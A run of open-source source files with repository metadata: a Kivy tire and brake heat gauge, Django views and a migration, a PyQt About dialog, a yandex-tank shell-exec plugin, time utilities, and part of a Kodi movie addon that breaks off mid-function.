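method = fields[0].replace("4", "").replace("6", "")  # "GET4" -> "GET" (address-family digit stripped)
response = {
    "dst_addr": fields[1],
    "rt": float(fields[2]) * 1000,  # scaled to milliseconds, as in HttpResult.__init__
    "res": int(fields[3]),
    "hsize": int(fields[4]),
    "bsize": int(fields[5]),
}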
autosportlabs/RaceCapture_App
autosportlabs/racecapture/widgets/heat/heatgauge.py
1
6048
#
# Race Capture App
#
# Copyright (C) 2014-2017 Autosport Labs
#
# This file is part of the Race Capture App
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License for more details. You should
# have received a copy of the GNU General Public License along with
# this code. If not, see <http://www.gnu.org/licenses/>.

import kivy

kivy.require('1.10.0')
from kivy.uix.anchorlayout import AnchorLayout
from kivy.app import Builder
from kivy.graphics import *
from kivy.properties import NumericProperty, ListProperty, StringProperty
from kivy.logger import Logger
from autosportlabs.uix.color.colorgradient import HeatColorGradient
from kivy.core.image import Image as CoreImage

HEAT_GAUGE_KV = """
<TireHeatGauge>:
"""


class BrakeHeatGauge(AnchorLayout):
    Builder.load_string(HEAT_GAUGE_KV)
    zones = NumericProperty(None)
    CENTER_SIZE_PCT = 0.5
    ROTOR_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/rotor.png')
    TIRE_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/tire.png')

    def __init__(self, **kwargs):
        super(BrakeHeatGauge, self).__init__(**kwargs)
        self.heat_gradient = HeatColorGradient()
        self.colors = []
        self.values = []
        self._init_view()
        self.bind(pos=self._update_gauge)
        self.bind(size=self._update_gauge)
        self.bind(zones=self._update_gauge)

    def on_zones(self, instance, value):
        self._sync_zones()

    def _init_view(self):
        self._sync_zones()

    def _sync_zones(self):
        zones = self.zones
        if zones is None:
            return
        values = self.values
        values.extend([0] * (zones - len(values)))
        colors = self.colors
        colors.extend([Color()] * (zones - len(colors)))
        self._update_gauge()

    def set_value(self, zone, value):
        try:
            rgba = self.heat_gradient.get_color_value(value)
            self.colors[zone].rgba = rgba
            self.values[zone] = value
        except IndexError:
            pass

    def _update_gauge(self, *args):
        self.canvas.clear()
        zones = self.zones
        if zones is None or zones == 0:
            return

        x = self.pos[0]
        y = self.pos[1]
        width = self.size[0]
        height = self.size[1]
        min_size = min(width, height)
        center_size = min_size * BrakeHeatGauge.CENTER_SIZE_PCT
        rw = ((min_size - center_size) / float(zones))
        center_x = x + (width / 2)
        center_y = y + (height / 2)

        index = zones
        with self.canvas:
            for i in range(0, zones):
                color = self.heat_gradient.get_color_value(self.values[index - 1])
                c = Color(rgba=color)
                self.colors[index - 1] = c
                segment_size = (index * (rw)) + center_size
                c_x = center_x - segment_size / 2
                c_y = center_y - segment_size / 2
                Ellipse(pos=(c_x, c_y), size=(segment_size, segment_size))
                index -= 1
            Color(1.0, 1.0, 1.0, 1.0)
            r_x = center_x - (center_size / 2)
            r_y = center_y - (center_size / 2)
            Rectangle(texture=BrakeHeatGauge.ROTOR_IMAGE.texture, pos=(r_x, r_y), size=(center_size, center_size))

    def on_values(self, instance, value):
        pass


class TireHeatGauge(AnchorLayout):
    Builder.load_string(HEAT_GAUGE_KV)
    zones = NumericProperty(None)
    direction = StringProperty('left-right')

    def __init__(self, **kwargs):
        super(TireHeatGauge, self).__init__(**kwargs)
        self.heat_gradient = HeatColorGradient()
        self.colors = []
        self.values = []
        self._init_view()
        self.bind(pos=self._update_gauge)
        self.bind(size=self._update_gauge)
        self.bind(zones=self._update_gauge)
        self.bind(direction=self._update_gauge)

    def on_zones(self, instance, value):
        self._sync_zones()

    def _init_view(self):
        self._sync_zones()

    def _sync_zones(self):
        zones = self.zones
        if zones is None:
            return
        values = self.values
        values.extend([0] * (zones - len(values)))
        colors = self.colors
        colors.extend([Color()] * (zones - len(colors)))
        self._update_gauge()

    def set_value(self, zone, value):
        try:
            rgba = self.heat_gradient.get_color_value(value)
            self.colors[zone].rgba = rgba
            self.values[zone] = value
        except IndexError:
            pass

    def _update_gauge(self, *args):
        self.canvas.clear()
        zones = self.zones
        if zones is None or zones == 0:
            return

        x = self.pos[0]
        y = self.pos[1]
        width = self.size[0]
        height = self.size[1]
        rw = width / float(zones)

        if self.direction == 'left-right':
            index = 0
            index_dir = 1
        elif self.direction == 'right-left':
            index = zones - 1
            index_dir = -1
        else:
            raise Exception('Invalid direction {}'.format(self.direction))

        with self.canvas:
            for i in range(0, zones):
                xp = x + (rw * i)
                color = self.heat_gradient.get_color_value(self.values[index])
                c = Color(rgba=color)
                self.colors[index] = c
                Rectangle(pos=(xp, y), size=(rw, height))
                index += index_dir
            Color(rgba=(0.0, 0.0, 0.0, 1.0))
            Rectangle(texture=BrakeHeatGauge.TIRE_IMAGE.texture, pos=(x, y), size=(width, height))

    def on_values(self, instance, value):
        pass
gpl-3.0
8,670,585,709,165,813,000
30.831579
114
0.582837
false
3.64118
false
false
false
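Both gauges above map each zone's value through HeatColorGradient and redraw whenever pos, size, or zones changes; TireHeatGauge's direction handling reduces to picking a start index and a step. That index walk, extracted here purely for illustration:

def zone_indices(zones, direction):
    # Mirrors the branch in TireHeatGauge._update_gauge.
    if direction == 'left-right':
        index, step = 0, 1
    elif direction == 'right-left':
        index, step = zones - 1, -1
    else:
        raise Exception('Invalid direction {}'.format(direction))
    for _ in range(zones):
        yield index
        index += step

print(list(zone_indices(4, 'right-left')))  # [3, 2, 1, 0]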
stencila/hub
manager/projects/ui/views/reviews.py
1
1679
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render

from projects.api.serializers import ReviewUpdateSerializer
from projects.api.views.reviews import ProjectsReviewsViewSet


def list(request: HttpRequest, *args, **kwargs) -> HttpResponse:
    """
    List reviews for a project.
    """
    viewset = ProjectsReviewsViewSet.init("list", request, args, kwargs)
    reviews = viewset.get_queryset()
    context = viewset.get_response_context(queryset=reviews)
    meta = viewset.get_project().get_meta()
    return render(request, "projects/reviews/list.html", dict(**context, meta=meta))


def create(request: HttpRequest, *args, **kwargs) -> HttpResponse:
    """
    Create a review for a project.
    """
    viewset = ProjectsReviewsViewSet.init("create", request, args, kwargs)
    serializer = viewset.get_serializer()
    context = viewset.get_response_context(serializer=serializer)
    meta = viewset.get_project().get_meta()
    return render(request, "projects/reviews/create.html", dict(**context, meta=meta))


def retrieve(request: HttpRequest, *args, **kwargs) -> HttpResponse:
    """
    Retrieve a review from a project.
    """
    viewset = ProjectsReviewsViewSet.init("retrieve", request, args, kwargs)
    review = viewset.get_object()
    context = viewset.get_response_context(instance=review)
    serializer = (
        ReviewUpdateSerializer()
        if context.get("is_editor") or context.get("is_user")
        else None
    )
    meta = viewset.get_project().get_meta()
    return render(
        request,
        "projects/reviews/retrieve.html",
        dict(**context, serializer=serializer, meta=meta),
    )
apache-2.0
-6,900,870,597,921,345,000
34.723404
86
0.69327
false
3.950588
false
false
false
mxmaslin/Test-tasks
tests_django/apps/playschool/migrations/0001_initial.py
1
1954
# Generated by Django 2.1.1 on 2018-09-29 17:59

import django.core.validators
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Record',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField(auto_now_add=True)),
                ('has_came_with', models.CharField(choices=[('M', 'Mother'), ('F', 'Father')], default='M', max_length=1)),
                ('time_arrived', models.DateTimeField()),
                ('time_departed', models.DateTimeField()),
            ],
            options={
                'ordering': ('-date',),
            },
        ),
        migrations.CreateModel(
            name='Scholar',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('photo', models.ImageField(blank=True, null=True, upload_to='playschool/images/%Y/%m/%d')),
                ('name', models.CharField(max_length=50)),
                ('sex', models.CharField(choices=[('M', 'Boy'), ('F', 'Girl')], default='F', max_length=1)),
                ('birth_date', models.DateField()),
                ('school_class', models.PositiveIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(11)])),
                ('is_studying', models.BooleanField()),
            ],
            options={
                'ordering': ('school_class', 'name'),
            },
        ),
        migrations.AddField(
            model_name='record',
            name='scholar',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='playschool.Scholar'),
        ),
    ]
gpl-3.0
5,469,782,674,536,385,000
38.877551
177
0.547083
false
4.211207
false
false
false
handsomegui/Gereqi
gereqi/Ui_about.py
1
4402
# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file 'about.ui'
#
# Created: Fri Sep 10 23:16:30 2010
#      by: PyQt4 UI code generator 4.7.3
#
# WARNING! All changes made in this file will be lost!

from PyQt4 import QtCore, QtGui

class Ui_About(object):
    def setupUi(self, About):
        About.setObjectName("About")
        About.resize(253, 309)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(":/Icons/app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        About.setWindowIcon(icon)
        self.gridLayout = QtGui.QGridLayout(About)
        self.gridLayout.setObjectName("gridLayout")
        self.buttonBox = QtGui.QDialogButtonBox(About)
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Close)
        self.buttonBox.setObjectName("buttonBox")
        self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
        self.textBrowser = QtGui.QTextBrowser(About)
        self.textBrowser.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.textBrowser.setFrameShape(QtGui.QFrame.NoFrame)
        self.textBrowser.setFrameShadow(QtGui.QFrame.Plain)
        self.textBrowser.setTabChangesFocus(True)
        self.textBrowser.setAcceptRichText(False)
        self.textBrowser.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
        self.textBrowser.setOpenExternalLinks(True)
        self.textBrowser.setOpenLinks(False)
        self.textBrowser.setObjectName("textBrowser")
        self.gridLayout.addWidget(self.textBrowser, 0, 0, 1, 1)

        self.retranslateUi(About)
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), About.accept)
        QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), About.reject)
        QtCore.QMetaObject.connectSlotsByName(About)

    def retranslateUi(self, About):
        About.setWindowTitle(QtGui.QApplication.translate("About", "About Gereqi", None, QtGui.QApplication.UnicodeUTF8))
        self.textBrowser.setHtml(QtGui.QApplication.translate("About", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Droid Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><img src=\":/Icons/app.png\" /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:18pt; font-weight:600;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:18pt; font-weight:600;\">Gereqi</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">version 0.4.2</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">© 2009,2010 Contributors</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Visit <a href=\"http://code.google.com/p/gereqi/\"><span style=\" text-decoration: underline; color:#e85290;\">http://code.google.com/p/gereqi/</span></a></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
gpl-3.0
-5,543,503,231,855,172,000
72.35
335
0.696887
false
2.993878
false
false
false
nnugumanov/yandex-tank
yandextank/plugins/ShellExec/plugin.py
1
2286
'''
Contains shellexec plugin
'''
from ...common import util
from ...common.interfaces import AbstractPlugin


class Plugin(AbstractPlugin):
    '''
    ShellExec plugin allows executing shell scripts before/after test
    '''
    SECTION = 'shellexec'

    def __init__(self, core, config_section):
        AbstractPlugin.__init__(self, core, config_section)
        self.catch_out = False
        self.end = None
        self.poll = None
        self.prepare = None
        self.start = None
        self.postprocess = None

    @staticmethod
    def get_key():
        return __file__

    def get_available_options(self):
        return ["prepare", "start", "end", "poll", "post_process", "catch_out"]

    def configure(self):
        self.catch_out = True if self.get_option("catch_out", False) else False
        self.prepare = self.get_option("prepare", '')
        self.start = self.get_option("start", '')
        self.end = self.get_option("end", '')
        self.poll = self.get_option("poll", '')
        self.postprocess = self.get_option("post_process", '')

    def prepare_test(self):
        if self.prepare:
            self.execute(self.prepare)

    def start_test(self):
        if self.start:
            self.execute(self.start)

    def is_test_finished(self):
        if self.poll:
            self.log.info("Executing: %s", self.poll)
            retcode = util.execute(
                self.poll, shell=True, poll_period=0.1,
                catch_out=self.catch_out)[0]
            if retcode:
                self.log.warn(
                    "Non-zero exit code, interrupting test: %s", retcode)
                return retcode
        return -1

    def end_test(self, retcode):
        if self.end:
            self.execute(self.end)
        return retcode

    def post_process(self, retcode):
        if self.postprocess:
            self.execute(self.postprocess)
        return retcode

    def execute(self, cmd):
        '''
        Execute and check exit code
        '''
        self.log.info("Executing: %s", cmd)
        retcode = util.execute(
            cmd, shell=True, poll_period=0.1, catch_out=self.catch_out)[0]
        if retcode:
            raise RuntimeError("Subprocess returned %s" % retcode)
lgpl-2.1
941,401,629,749,793,200
27.936709
79
0.559055
false
4.031746
true
false
false
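The plugin above maps six options onto the tank lifecycle: prepare, start, end, and post_process each run once, while poll is re-run on every is_test_finished tick and any non-zero exit code aborts the test. A reduced sketch of that poll contract, using subprocess.call as a stand-in for yandextank's util.execute:

import subprocess

def is_test_finished(poll_cmd):
    # util.execute(...)[0] in the plugin returns the child's exit code.
    retcode = subprocess.call(poll_cmd, shell=True)
    if retcode:
        return retcode  # non-zero: stop the test and report this code
    return -1           # -1 tells the tank to keep running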
Jackeriss/Typora-Blog
app/util/time_util.py
1
3493
import asyncio
import functools
import locale
import logging
import time
from datetime import datetime

import pytz

from app.util.config_util import config


def str2datetime(value, default=None, time_format="%Y-%m-%d %H:%M:%S"):
    try:
        return datetime.strptime(value, time_format)
    except Exception as exception:
        logging.exception(f"str2datetime failed!value:{value} exception:{exception}")
        return default


def time_str2timestamp(time_str):
    if ":" in time_str:
        if "/" in time_str:
            return (
                time_str.split("/")[0],
                time.mktime(
                    datetime.strptime(time_str, "%Y/%m/%d %H:%M:%S").timetuple()
                ),
            )
        return (
            time_str.split("-")[0],
            time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H:%M:%S").timetuple()),
        )
    elif "/" in time_str:
        return (
            time_str.split("/")[0],
            time.mktime(datetime.strptime(time_str, "%Y/%m/%d %H-%M-%S").timetuple()),
        )
    else:
        return (
            time_str.split("-")[0],
            time.mktime(datetime.strptime(time_str, "%Y-%m-%d %H-%M-%S").timetuple()),
        )


def str2timestamp(value, default=0, time_format="%Y-%m-%d %H:%M:%S"):
    try:
        return datetime.strptime(value, time_format).timestamp() * 1000
    except Exception as exception:
        logging.exception(f"str2timestamp failed!value:{value} exception:{exception}")
        return default


def timestamp2str(value, time_format="%Y-%m-%d %H:%M:%S"):
    if not value:
        return ""
    try:
        return datetime.fromtimestamp(value, pytz.UTC).strftime(time_format)
    except Exception as exception:
        logging.exception(f"timestamp2str failed!value:{value} exception:{exception}")
        return ""


def datetime2str(value, default="", time_format="%Y-%m-%d %H:%M:%S"):
    if not isinstance(value, datetime):
        return default
    try:
        locale.setlocale(locale.LC_TIME, "en_US.UTF-8")
        return value.strftime(time_format)
    except Exception as exception:
        logging.exception(f"datetime2str failed!value:{value} exception:{exception}")
        return default


def timestamp():
    """Get the current UTC timestamp"""
    return int(datetime.utcnow().timestamp())


def now():
    """Get the current UTC time"""
    return datetime.utcnow()


def timeout_log(timeout=10, tag="", debug=False):
    """
    Log a function's execution time.

    timeout: log an error when the call takes longer than this, in seconds
    tag: label attached to the log record
    """

    def decorator(func):
        def _time_log(time_start, time_end, function_name):
            if not debug and config.server["debug"]:
                return
            cost = (time_end - time_start).total_seconds()
            if cost > timeout:
                logging.error(f"TIME OUT:{tag}, function:{function_name}, cost:{cost}s")

        @functools.wraps(func)
        async def _async_wrapper(*args, **kwargs):
            start = now()
            result = await func(*args, **kwargs)
            _time_log(start, now(), func.__name__)
            return result

        @functools.wraps(func)
        def _sync_wrapper(*args, **kwargs):
            start = now()
            result = func(*args, **kwargs)
            _time_log(start, now(), func.__name__)
            return result

        if asyncio.iscoroutinefunction(func):
            return _async_wrapper
        return _sync_wrapper

    return decorator
mit
6,112,573,830,291,964,000
28.626087
88
0.57059
false
3.695228
false
false
false
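timeout_log above decorates both sync and async callables and only emits a log line when the call exceeds its time budget. A minimal usage sketch; the decorated functions are illustrative, and debug=True bypasses the config.server["debug"] check so no config file is needed:

import asyncio
import time

@timeout_log(timeout=1, tag="demo", debug=True)
def slow_step():
    time.sleep(1.5)  # over budget: logs "TIME OUT:demo, function:slow_step, cost:~1.5s"

@timeout_log(timeout=1, tag="demo-async", debug=True)
async def slow_io():
    await asyncio.sleep(1.5)

slow_step()
asyncio.run(slow_io())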
SMALLplayer/smallplayer-image-creator
storage/.xbmc/addons/plugin.video.muchmovies.hd/default.py
1
51620
# -*- coding: utf-8 -*-

'''
    Much Movies HD XBMC Addon
    Copyright (C) 2014 lambda

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program. If not, see <http://www.gnu.org/licenses/>.
'''

import sys,urllib,urllib2,re,os,threading,datetime,xbmc,xbmcplugin,xbmcgui,xbmcaddon,xbmcvfs
from operator import itemgetter
try: import json
except: import simplejson as json
try: import CommonFunctions
except: import commonfunctionsdummy as CommonFunctions
from metahandler import metahandlers
from metahandler import metacontainers

language = xbmcaddon.Addon().getLocalizedString
setSetting = xbmcaddon.Addon().setSetting
getSetting = xbmcaddon.Addon().getSetting
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
addonDesc = language(30450).encode("utf-8")
addonIcon = os.path.join(addonPath,'icon.png')
addonFanart = os.path.join(addonPath,'fanart.jpg')
addonArt = os.path.join(addonPath,'resources/art')
addonDownloads = os.path.join(addonPath,'resources/art/Downloads.png')
addonPages = os.path.join(addonPath,'resources/art/Pages.png')
addonNext = os.path.join(addonPath,'resources/art/Next.png')
dataPath = xbmc.translatePath('special://profile/addon_data/%s' % (addonId))
viewData = os.path.join(dataPath,'views.cfg')
favData = os.path.join(dataPath,'favourites.cfg')
metaget = metahandlers.MetaData(preparezip=False)
common = CommonFunctions
action = None


class main:
    def __init__(self):
        global action
        index().container_data()
        params = {}
        splitparams = sys.argv[2][sys.argv[2].find('?') + 1:].split('&')
        for param in splitparams:
            if (len(param) > 0):
                splitparam = param.split('=')
                key = splitparam[0]
                try: value = splitparam[1].encode("utf-8")
                except: value = splitparam[1]
                params[key] = value
        try: action = urllib.unquote_plus(params["action"])
        except: action = None
        try: name = urllib.unquote_plus(params["name"])
        except: name = None
        try: url = urllib.unquote_plus(params["url"])
        except: url = None
        try: image = urllib.unquote_plus(params["image"])
        except: image = None
        try: query = urllib.unquote_plus(params["query"])
        except: query = None
        try: title = urllib.unquote_plus(params["title"])
        except: title = None
        try: year = urllib.unquote_plus(params["year"])
        except: year = None
        try: imdb = urllib.unquote_plus(params["imdb"])
        except: imdb = None
        if action == None: root().get()
        elif action == 'item_play': contextMenu().item_play()
        elif action == 'item_random_play': contextMenu().item_random_play()
        elif action == 'item_queue': contextMenu().item_queue()
        elif action == 'favourite_add': contextMenu().favourite_add(favData, name, url, image, imdb)
        elif action == 'favourite_from_search': contextMenu().favourite_from_search(favData, name, url, image, imdb)
        elif action == 'favourite_delete': contextMenu().favourite_delete(favData, name, url)
        elif action == 'favourite_moveUp': contextMenu().favourite_moveUp(favData, name, url)
        elif action == 'favourite_moveDown':
            contextMenu().favourite_moveDown(favData, name, url)
        elif action == 'playlist_open': contextMenu().playlist_open()
        elif action == 'settings_open': contextMenu().settings_open()
        elif action == 'addon_home': contextMenu().addon_home()
        elif action == 'view_movies': contextMenu().view('movies')
        elif action == 'metadata_movies': contextMenu().metadata('movie', name, url, imdb, '', '')
        elif action == 'metadata_movies2': contextMenu().metadata('movie', name, url, imdb, '', '')
        elif action == 'playcount_movies': contextMenu().playcount('movie', imdb, '', '')
        elif action == 'library': contextMenu().library(name, url)
        elif action == 'download': contextMenu().download(name, url)
        elif action == 'trailer': contextMenu().trailer(name, url)
        elif action == 'movies': movies().muchmovies(url)
        elif action == 'movies_title': movies().muchmovies_title()
        elif action == 'movies_release': movies().muchmovies_release()
        elif action == 'movies_added': movies().muchmovies_added()
        elif action == 'movies_rating': movies().muchmovies_rating()
        elif action == 'movies_search': movies().muchmovies_search(query)
        elif action == 'movies_favourites': favourites().movies()
        elif action == 'pages_movies': pages().muchmovies()
        elif action == 'genres_movies': genres().muchmovies()
        elif action == 'play': resolver().run(url, name)
        if action is None: pass
        elif action.startswith('movies'):
            xbmcplugin.setContent(int(sys.argv[1]), 'movies')
            index().container_view('movies', {'skin.confluence' : 500})
        xbmcplugin.setPluginFanart(int(sys.argv[1]), addonFanart)
        xbmcplugin.endOfDirectory(int(sys.argv[1]))
        return


class getUrl(object):
    def __init__(self, url, fetch=True, close=True, cookie=False, mobile=False, proxy=None, post=None, referer=None):
        if not proxy is None:
            proxy_handler = urllib2.ProxyHandler({'http':'%s' % (proxy)})
            opener = urllib2.build_opener(proxy_handler, urllib2.HTTPHandler)
            opener = urllib2.install_opener(opener)
        if cookie == True:
            import cookielib
            cookie_handler = urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())
            opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
            opener = urllib2.install_opener(opener)
        if not post is None:
            request = urllib2.Request(url, post)
        else:
            request = urllib2.Request(url,None)
        if mobile == True:
            request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7')
        else:
            request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0')
        if not referer is None:
            request.add_header('Referer', referer)
        response = urllib2.urlopen(request, timeout=30)
        if fetch == True:
            result = response.read()
        else:
            result = response.geturl()
        if close == True:
            response.close()
        self.result = result


class uniqueList(object):
    def __init__(self, list):
        uniqueSet = set()
        uniqueList = []
        for n in list:
            if n not in uniqueSet:
                uniqueSet.add(n)
                uniqueList.append(n)
        self.list = uniqueList


class Thread(threading.Thread):
    def __init__(self, target, *args):
        self._target = target
        self._args = args
        threading.Thread.__init__(self)

    def run(self):
        self._target(*self._args)


class player(xbmc.Player):
    def __init__ (self):
        self.property = addonName+'player_status'
        xbmc.Player.__init__(self)

    def status(self):
        getProperty = index().getProperty(self.property)
        index().clearProperty(self.property)
        if not xbmc.getInfoLabel('Container.FolderPath') == '': return
        if getProperty == 'true': return True
        return

    def run(self, name, url, imdb='0'):
        if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
            item = xbmcgui.ListItem(path=url)
            xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
        else:
            try:
                file = name + '.strm'
                file = file.translate(None, '\/:*?"<>|')
                meta = xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.GetMovies", "params": {"properties" : ["title", "genre", "year", "rating", "director", "trailer", "tagline", "plot", "plotoutline", "originaltitle", "lastplayed", "playcount", "writer", "studio", "mpaa", "country", "imdbnumber", "runtime", "votes", "fanart", "thumbnail", "file", "sorttitle", "resume", "dateadded"]}, "id": 1}')
                meta = unicode(meta, 'utf-8', errors='ignore')
                meta = json.loads(meta)
                meta = meta['result']['movies']
                self.meta = [i for i in meta if i['file'].endswith(file)][0]
                meta = {'title': self.meta['title'], 'originaltitle': self.meta['originaltitle'], 'year': self.meta['year'], 'genre': str(self.meta['genre']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'director': str(self.meta['director']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'country': str(self.meta['country']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'rating': self.meta['rating'], 'votes': self.meta['votes'], 'mpaa': self.meta['mpaa'], 'duration': self.meta['runtime'], 'trailer': self.meta['trailer'], 'writer': str(self.meta['writer']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'studio': str(self.meta['studio']).replace("[u'", '').replace("']", '').replace("', u'", ' / '), 'tagline': self.meta['tagline'], 'plotoutline': self.meta['plotoutline'], 'plot': self.meta['plot']}
                poster = self.meta['thumbnail']
            except:
                meta = {'label' : name, 'title' : name}
                poster = ''
            item = xbmcgui.ListItem(path=url, iconImage="DefaultVideo.png", thumbnailImage=poster)
            item.setInfo( type="Video", infoLabels= meta )
            xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
        for i in range(1, 21):
            try: self.totalTime = self.getTotalTime()
            except: self.totalTime = 0
            if not self.totalTime == 0: continue
            xbmc.sleep(1000)
        if self.totalTime == 0: return
        subtitles().get(name)
        self.content = 'movie'
        self.season = str(xbmc.getInfoLabel('VideoPlayer.season'))
        self.episode = str(xbmc.getInfoLabel('VideoPlayer.episode'))
        if imdb == '0':
            imdb = metaget.get_meta('movie', xbmc.getInfoLabel('VideoPlayer.title') ,year=str(xbmc.getInfoLabel('VideoPlayer.year')))['imdb_id']
        imdb = re.sub("[^0-9]", "", imdb)
        self.imdb = imdb
        while True:
            try: self.currentTime = self.getTime()
            except: break
            xbmc.sleep(1000)

    def onPlayBackEnded(self):
        if xbmc.getInfoLabel('Container.FolderPath') == '': index().setProperty(self.property, 'true')
        if not self.currentTime / self.totalTime >= .9: return
        if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
            metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
            index().container_refresh()
        else:
            try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
            except: pass

    def onPlayBackStopped(self):
        index().clearProperty(self.property)
        if not self.currentTime / self.totalTime >= .9: return
        if xbmc.getInfoLabel('Container.FolderPath').startswith(sys.argv[0]):
            metaget.change_watched(self.content, '', self.imdb, season=self.season, episode=self.episode, year='', watched='')
            index().container_refresh()
        else:
            try: xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": {"movieid" : %s, "playcount" : 1 }, "id": 1 }' % str(self.meta['movieid']))
            except: pass


class subtitles:
    def get(self, name):
        subs = getSetting("subs")
        if subs == '1': self.greek(name)

    def greek(self, name):
        try:
            import shutil, zipfile, time
            sub_tmp = os.path.join(dataPath,'sub_tmp')
            sub_tmp2 = os.path.join(sub_tmp, "subs")
            sub_stream = os.path.join(dataPath,'sub_stream')
            sub_file = os.path.join(sub_tmp, 'sub_tmp.zip')
            try: os.makedirs(dataPath)
            except: pass
            try: os.remove(sub_tmp)
            except: pass
            try: shutil.rmtree(sub_tmp)
            except: pass
            try: os.makedirs(sub_tmp)
            except: pass
            try: os.remove(sub_stream)
            except: pass
            try: shutil.rmtree(sub_stream)
            except: pass
            try: os.makedirs(sub_stream)
            except: pass
            subtitles = []
            query = ''.join(e for e in name if e.isalnum() or e == ' ')
            query = urllib.quote_plus(query)
            url = 'http://www.greeksubtitles.info/search.php?name=' + query
            result = getUrl(url).result
            result = result.decode('iso-8859-7').encode('utf-8')
            result = result.lower().replace('"',"'")
            match = "get_greek_subtitles[.]php[?]id=(.+?)'.+?%s.+?<"
